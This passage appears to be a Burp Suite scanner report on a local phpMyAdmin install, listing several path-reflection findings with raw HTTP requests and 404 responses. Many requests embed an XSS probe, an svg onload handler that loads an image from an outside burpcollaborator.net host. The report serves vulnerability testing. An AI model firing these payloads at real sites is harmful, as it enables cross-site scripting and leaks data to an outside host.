Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/codemirror/addon/lint/sql-lint.jsceupy5vvch was not found on this server.</p>
...[SNIP]...
19.213. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/codemirror/addon/lint/sql-lint.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//xvw0ljiriobkniov08p6rfy7qywtkkmlad01xoncc%5c56burpcollaborator.net'%3e/js/codemirror/addon/lint/sql-lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 435
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//xvw0ljiriobkniov08p6rfy7qywtkkmlad01xoncc\56burpcollaborator.net'&gt;/js/codemirror/addon/lint/sql-lint.js was not found on this server.</p>
...[SNIP]...
19.214. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/codemirror/addon/lint/sql-lint.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/jsc1wpifh48h/codemirror/addon/lint/sql-lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:14 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/jsc1wpifh48h/codemirror/addon/lint/sql-lint.js was not found on this server.</p>
...[SNIP]...
19.215. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/codemirror/addon/lint/sql-lint.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/js/codemirror1y553e5qv5/addon/lint/sql-lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/codemirror1y553e5qv5/addon/lint/sql-lint.js was not found on this server.</p>
...[SNIP]...
19.216. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/codemirror/addon/lint/sql-lint.js

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /phpmyadmin/js/codemirror/addonq0vxdgkdch/lint/sql-lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/codemirror/addonq0vxdgkdch/lint/sql-lint.js was not found on this server.</p>
...[SNIP]...
19.217. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/codemirror/addon/lint/sql-lint.js

Issue detail

The value of the URL path folder 5 is copied into the application's response.

Request 1

GET /phpmyadmin/js/codemirror/addon/lintmssokyf87a/sql-lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:45 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/codemirror/addon/lintmssokyf87a/sql-lint.js was not found on this server.</p>
...[SNIP]...
19.218. http://localhost/phpmyadmin/js/common.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/common.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//l6sow7tftcm8y6zjbw0u239v1m7hv8xcl4bs2kpadz%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//l6sow7tftcm8y6zjbw0u239v1m7hv8xcl4bs2kpadz\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.219. http://localhost/phpmyadmin/js/common.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/common.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//h8qky3vbv8o4021fds2q4zbr3i9dx4z8n0doab0zp%5c56burpcollaborator.net'%3e/js/common.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 411
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//h8qky3vbv8o4021fds2q4zbr3i9dx4z8n0doab0zp\56burpcollaborator.net'&gt;/js/common.js was not found on this server.</p>
...[SNIP]...
19.220. http://localhost/phpmyadmin/js/common.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/common.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/js5tyzqi1dnx/common.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js5tyzqi1dnx/common.js was not found on this server.</p>
...[SNIP]...
19.221. http://localhost/phpmyadmin/js/config.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/config.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//7u2akth1hyaumsn5ziogqpxhp8v3jumkac00rsei27%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//7u2akth1hyaumsn5ziogqpxhp8v3jumkac00rsei27\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.222. http://localhost/phpmyadmin/js/config.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/config.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//tb8w1fynykrg3e4rg4527be36ucp0g36ryhme94xt%5c56burpcollaborator.net'%3e/js/config.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 411
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//tb8w1fynykrg3e4rg4527be36ucp0g36ryhme94xt\56burpcollaborator.net'&gt;/js/config.js was not found on this server.</p>
...[SNIP]...
19.223. http://localhost/phpmyadmin/js/config.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/config.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/jshpqdizba3z/config.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/jshpqdizba3z/config.js was not found on this server.</p>
...[SNIP]...
19.224. http://localhost/phpmyadmin/js/console.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/console.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//cbrf1yy6y3rz3x4agn5l7uem6dc80z3qrih68yvojd%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//cbrf1yy6y3rz3x4agn5l7uem6dc80z3qrih68yvojd\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.225. http://localhost/phpmyadmin/js/console.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/console.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//g3kjt2qaq7j3v1we8rxpzy6qyh4cs3vujm9a6xwll%5c56burpcollaborator.net'%3e/js/console.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 412
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//g3kjt2qaq7j3v1we8rxpzy6qyh4cs3vujm9a6xwll\56burpcollaborator.net'&gt;/js/console.js was not found on this server.</p>
...[SNIP]...
19.226. http://localhost/phpmyadmin/js/console.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/console.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/jssj2xqe14io/console.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/jssj2xqe14io/console.js was not found on this server.</p>
...[SNIP]...
19.227. http://localhost/phpmyadmin/js/cross_framing_protection.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/cross_framing_protection.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//cdtf3y0603tz5x6ain7l9ugm8de82z5stkj8a0xqlf%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//cdtf3y0603tz5x6ain7l9ugm8de82z5stkj8a0xqlf\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.228. http://localhost/phpmyadmin/js/cross_framing_protection.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/cross_framing_protection.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//ar5dhwe4e17xjvk8wlljnsukmbs6gxjq7ix6utkh9%5c56burpcollaborator.net'%3e/js/cross_framing_protection.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 429
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//ar5dhwe4e17xjvk8wlljnsukmbs6gxjq7ix6utkh9\56burpcollaborator.net'&gt;/js/cross_framing_protection.js was not found on this server.</p>
...[SNIP]...
19.229. http://localhost/phpmyadmin/js/cross_framing_protection.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/cross_framing_protection.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/js23no274fpr/cross_framing_protection.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:17 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 334
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js23no274fpr/cross_framing_protection.js was not found on this server.</p>
...[SNIP]...
19.230. http://localhost/phpmyadmin/js/doclinks.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/doclinks.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//2or5eobwbt4pgnh0tdibkkrcj3pydpif67wvnnady2%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//2or5eobwbt4pgnh0tdibkkrcj3pydpif67wvnnady2\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.231. http://localhost/phpmyadmin/js/doclinks.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/doclinks.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//716arto1oyhutsu56ivgxp4hw823quvkjc906nwbl%5c56burpcollaborator.net'%3e/js/doclinks.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//716arto1oyhutsu56ivgxp4hw823quvkjc906nwbl\56burpcollaborator.net'&gt;/js/doclinks.js was not found on this server.</p>
...[SNIP]...
19.232. http://localhost/phpmyadmin/js/doclinks.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/doclinks.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//dxegnzk7k4d0pyqb2ormtv0nsey9m0rqfi562tthi%5c56burpcollaborator.net'%3e/doclinks.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 421
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//dxegnzk7k4d0pyqb2ormtv0nsey9m0rqfi562tthi\56burpcollaborator.net'&gt;/doclinks.js was not found on this server.</p>
...[SNIP]...
19.233. http://localhost/phpmyadmin/js/error_report.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/error_report.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//zsv2ilftfq8mkklxxam8ohv9n0tvhmmea60urmec21%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//zsv2ilftfq8mkklxxam8ohv9n0tvhmmea60urmec21\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.234. http://localhost/phpmyadmin/js/error_report.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/error_report.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//8enb4u121zuv6t76jj8haqhi99f43v8nwfm3jq9ey%5c56burpcollaborator.net'%3e/js/error_report.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
